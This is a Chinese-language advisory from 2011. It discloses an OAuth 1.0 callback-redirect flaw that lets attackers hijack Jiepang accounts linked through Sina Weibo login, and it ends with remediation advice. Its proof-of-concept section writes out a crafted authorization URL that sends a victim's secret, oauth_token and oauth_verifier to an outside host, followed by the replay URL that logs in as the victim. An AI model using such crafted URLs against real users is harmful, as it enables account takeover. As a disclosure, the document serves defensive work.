街旁网第三方登录劫持漏洞
时间:2011-05-12 来源:秩名
简要描述:
街旁网使用了新浪微博的Oauth授权作为自己的第三方账户登录接口,由于Oauth1.0协议存在安全漏洞,导致通过新浪微博登录街旁网的账户能被任意劫持控制。
详细说明:
Oauth1.0协议存在安全漏洞,oauth_callback参数能重定向到任意网站,通过该漏洞黑客可以构造恶意的授权URL,从而获取用户关键的secret,oauth_token,oauth_verifier关键参数。
街旁使用的新浪微博的Oauth授权方式的登录接口存在此类型的漏洞,黑客可以任意劫持控制以此方式登录的街旁账户。
漏洞证明:
1.准备一个已授权街旁登录的新浪微博账户。
2.登录新浪微博后,受害者访问了恶意的授权URL,如重定向到163.com
http://api.t.sina.com.cn/oauth/authorize?oauth_token=
cb6bb803f402fb589cfd4885b71a6541&oauth_callback=
http%3A%2F%2F163.com%2Fsignup%2Fsina%3Fsecret=4296ae3151651e83b2117b09f798ae98&display=page
3.返回的第三方验证URL重定向到163.com
http://www.163.com/?secret=4296ae3151651e83b2117b09f798ae98&oauth_token=
cb6bb803f402fb589cfd4885b71a6541&oauth_verifier=446660
4.那么163服务器将可以盗取secret,oauth_token,oauth_verifier关键参数,通过街旁的登录接口登录受害者的账户。
http://jiepang.com/signup/sina?secret=4296ae3151651e83b2117b09f798ae98&oauth_token=
cb6bb803f402fb589cfd4885b71a6541&oauth_verifier=446660
整个过程只需要受害者在新浪微博上点击一个恶意的授权URL即可。
修复方案:
建议和新浪相关方协商
1.将街旁的授权接口的oauth_callback参数限定为街旁固定的安全的URL。
2.控制oauth授权的时效性,不使用永久授权方式。
标签分类: